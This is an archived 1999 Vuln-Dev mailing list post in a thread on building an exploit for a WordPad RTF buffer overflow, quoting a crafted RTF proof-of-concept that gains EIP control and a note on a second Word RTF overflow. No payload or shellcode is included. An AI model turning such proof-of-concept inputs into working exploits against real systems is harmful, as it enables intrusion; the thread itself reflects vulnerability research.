Vulnerability Development mailing list archives
Re: development of wordpad exploit
From: bwrics () ANTIONLINE ORG (Aubrey Smith)
Date: Sat, 20 Nov 1999 01:37:47 -0800
('binary' encoding is not supported, stored as-is) Gerardo, for those of us who are less exploit-savvy, could you please explain how your hack works? The only text that I saw in your attached kk.rtf file was "hola". While Spanish has been know to overflow my buffers (being and english-only speaker), I would like to know how you are using the overflow and how I could duplicate your hack (for educational purposes only, except possibly where my mother-in-law is concerned). Thanks
Date: Fri, 19 Nov 1999 13:40:45 -0300 Reply-To: Gerardo Richarte <core.lists.exploit-dev () CORE-SDI COM> From: Gerardo Richarte <core.lists.exploit-dev () CORE-SDI COM> Subject: Re: development of wordpad exploit To: VULN-DEV () SECURITYFOCUS COM "hypoclear - lUSt - (Linux Users Strike Today)" wrote:I light of the latest windows vulnerability in wordpad, it would be great if in this forum we could develop an exploit for it. As of now details of the vulnerability are on the net, however no exploit exists yet. This would be an excellent opportunity for all of us who don't really know how to code exploits (yet) to see all the details of developing one. Anyone else like this idea?!?I've been playing with this since yesterday. Just today could make the buffer overflow with EIP pointing to 0x61616161, BUT... (of course, what did you expected?), first what's first: demo: ---------- kk.rtf ----------------------------- {\rtf1\abcdefghijklmnaabbstuvwxyzabcdefghijklmnccddstuvwxyzabcdefghijklmneeffstuvwxyzabcdefghijklmngghhstuvwxyzabcdefghijklmniijjstuvwxyzabcdefghijklmnkkllstuvwxyzabcdefghijklmnmmnnstuvwxyzansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}} {\colortbl\red0\green0\blue0;} \deflang1033\pard\plain\f2\fs20 hola \par } ^@ ----------------------------------------------- [lines finishing in '}}',';}','hola',' }','^@'] It's a standard RTF file for the text 'hola', plus, an inserted string ('abcde....xyz') befor the string 'ansi'. 'ccdd' is the return address (EIP) If the string ansi is missing (i tested with some other strings, not every other string...) nothing 'good' happens. Any non letter character befor the string 'ccdd' makes nothing happen. I'm not sure which characters can be in this section of the .RTF. If uppercase letters are used, they are lowercased (at least the return address) (!!! It's what looks like, but in the original post, it says EIP = 0x41414141, what I couldn't reproduce...) I can't find the [reminding or original] string in memory... I'll continue some more time with this, but it doesn't look too easy to exploit... richie PS:if you have Word installed, this is the default opener for RTFs (which doesn't crash), what makes it a little harder to exploit remotley PPS: I found another buffer overflow that affects Word, use a .RTF file like {\rtf\AAAAAAAAAAAA..............} (more that 5000 As) this doesn't make EIP = 0x41414141, it makes ESI = 0x41414141, and if you use more than 10.000 As, it makes EDI = 0x41414141. It may be exploitable, but doesn't look easy. -- A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0 Investigacion y Desarrollo - CoreLabs - Core SDI http://www.core-sdi.com << kk.rtf >>
------------------------------------------------------------ I Got My Free E-mail Account, Get Yours! - http://www.AntiOnline.com AntiOnline - The Internet's Information Security Super Center!
Current thread:
- Re: development of wordpad exploit, (continued)
- Re: development of wordpad exploit Jason Paulson (Nov 19)
- Re: development of wordpad exploit Riley, Steven (Nov 19)
- Re: development of wordpad exploit Thomas Dullien (Nov 19)
- Re: development of wordpad exploit Harlan Carvey (Nov 19)
- Re: development of wordpad exploit Vanna P. Rella (Nov 19)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Blue Boar (Nov 19)
- Re: development of wordpad exploit Rodrick Brown (Nov 19)
- [Fwd: INZIDER!] Blue Boar (Nov 19)
- Re: development of wordpad exploit Seth R Arnold (Nov 20)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Aubrey Smith (Nov 20)
- Re: development of wordpad exploit Thomas Dullien (Nov 20)
- Re: development of wordpad exploit Dave Harvill (Nov 20)
- Re: development of wordpad exploit Pauli Ojanpera (Nov 21)
- Re: development of wordpad exploit Thomas Dullien (Nov 22)